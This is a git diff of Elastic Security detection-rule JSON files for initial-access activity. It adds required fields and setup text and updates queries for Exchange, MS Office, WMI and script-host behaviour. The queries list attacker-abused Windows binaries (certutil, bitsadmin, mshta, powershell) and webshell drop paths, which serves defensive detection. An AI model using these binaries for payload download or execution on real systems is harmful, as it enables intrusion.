b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json index dd5f00a4a3e35..9c79e8c157b21 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Password Recovery Requested", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:PasswordRecoveryRequested and event.outcome:success\n", "references": [ "https://www.cadosecurity.com/an-ongoing-aws-phishing-campaign/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "69c420e8-6c9e-4d28-86c0-8a2be2d1e78c", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json index b3d3d7f94f113..5fc24a67effab 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json @@ -17,6 +17,38 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 73, "rule_id": "143cb236-0956-4f42-a706-814bcaa0cf5a", "severity": "high", @@ -47,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 11 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json index 98a900c63695b..7b7a913251464 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json @@ -17,6 +17,38 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 73, "rule_id": "32923416-763a-4531-bb35-f33b9232ecdb", "severity": "high", @@ -47,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 11 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json index 58e985b001f5d..48175e02df69d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Script Executing PowerShell", - "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs,\nsuch as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but\ncan also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives\n(B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs,\nsuch as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but\ncan also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives\n(B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"cscript.exe\", \"wscript.exe\") and process.name : \"powershell.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json index d7bc4582cf891..9369274b2961b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json @@ -12,7 +12,64 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Script Interpreter Executing Process via WMI", - "query": "sequence by host.id with maxspan = 5s\n [library where dll.name : \"wmiutils.dll\" and process.name : (\"wscript.exe\", \"cscript.exe\")]\n [process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"wmiprvse.exe\" and\n user.domain != \"NT AUTHORITY\" and\n (process.pe.original_file_name :\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) or\n process.executable : (\"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n )\n ]\n", + "query": "sequence by host.id with maxspan = 5s\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\") and process.name : (\"wscript.exe\", \"cscript.exe\")]\n [process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"wmiprvse.exe\" and\n user.domain != \"NT AUTHORITY\" and\n (process.pe.original_file_name :\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) or\n process.executable : (\"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n )\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b64b183e-1a76-422d-9179-7b389513e74d", "severity": "medium", @@ -48,5 +105,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json index 794d06734ef53..30e4b0f02ead2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json @@ -17,6 +17,38 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 73, "rule_id": "c82b2bd8-d701-420c-ba43-f11a155b681a", "severity": "high", @@ -62,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 11 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json index abcc8d06444e0..d2d2231f7a1bc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Activity Reported by Okta User", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.account.report_suspicious_activity_by_enduser\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f994964f-6fce-4d75-8e79-e16ccc412588", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -94,5 +113,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json index 73b0718e0f27d..1dc01af8d100f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json @@ -14,6 +14,28 @@ "references": [ "https://blog.malwarebytes.com/cybercrime/2017/02/microsoft-office-macro-malware-targets-macs/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "66da12b1-ac83-40eb-814c-07ed1d82b7b9", "severity": "medium", @@ -50,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json index ba307ded580b4..81eafc8a65407 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json @@ -17,14 +17,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Exchange Server UM Writing Suspicious Files", - "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)", "query": "file where event.type == \"creation\" and\n process.name : (\"UMWorkerProcess.exe\", \"umservice.exe\") and\n file.extension : (\"php\", \"jsp\", \"js\", \"aspx\", \"asmx\", \"asax\", \"cfm\", \"shtml\") and\n (\n file.path : \"?:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\" or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\*\" and\n not (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\version\\\\*\" or\n file.name : (\"errorFE.aspx\", \"expiredpassword.aspx\", \"frowny.aspx\", \"GetIdToken.htm\", \"logoff.aspx\",\n \"logon.aspx\", \"OutlookCN.aspx\", \"RedirSuiteServiceProxy.aspx\", \"signout.aspx\"))) or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\ecp\\\\auth\\\\*\" and\n not file.name : \"TimeoutLogoff.aspx\")\n )\n", "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json index a1b371b84d7ac..3645a665213ea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json @@ -16,14 +16,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Exchange Server UM Spawning Suspicious Processes", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.name : (\"werfault.exe\", \"wermgr.exe\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\werfault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V??\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange 2016\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\ExchangeServer\\\\Bin\\\\UMWorkerProcess.exe\")\n", "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json index f125a3b27e25d..a9d993e4af246 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json @@ -12,15 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Exchange Worker Spawning Suspicious Processes", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.parent.name : \"w3wp.exe\" and process.parent.args : \"MSExchange*AppPool\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities", "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -48,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json index 656199c7fa9a4..cdc57d7147aa1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious MS Office Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\", \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\") and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\", \"certutil.exe\",\n \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\", \"dsquery.exe\", \"forfiles.exe\", \n \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \n \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \n \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\", \n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\",\n \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Office Child Process\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer.\nYou can create and edit documents containing text and images, work with data in spreadsheets and databases, and create\npresentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted\nfor initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of\nmalicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - 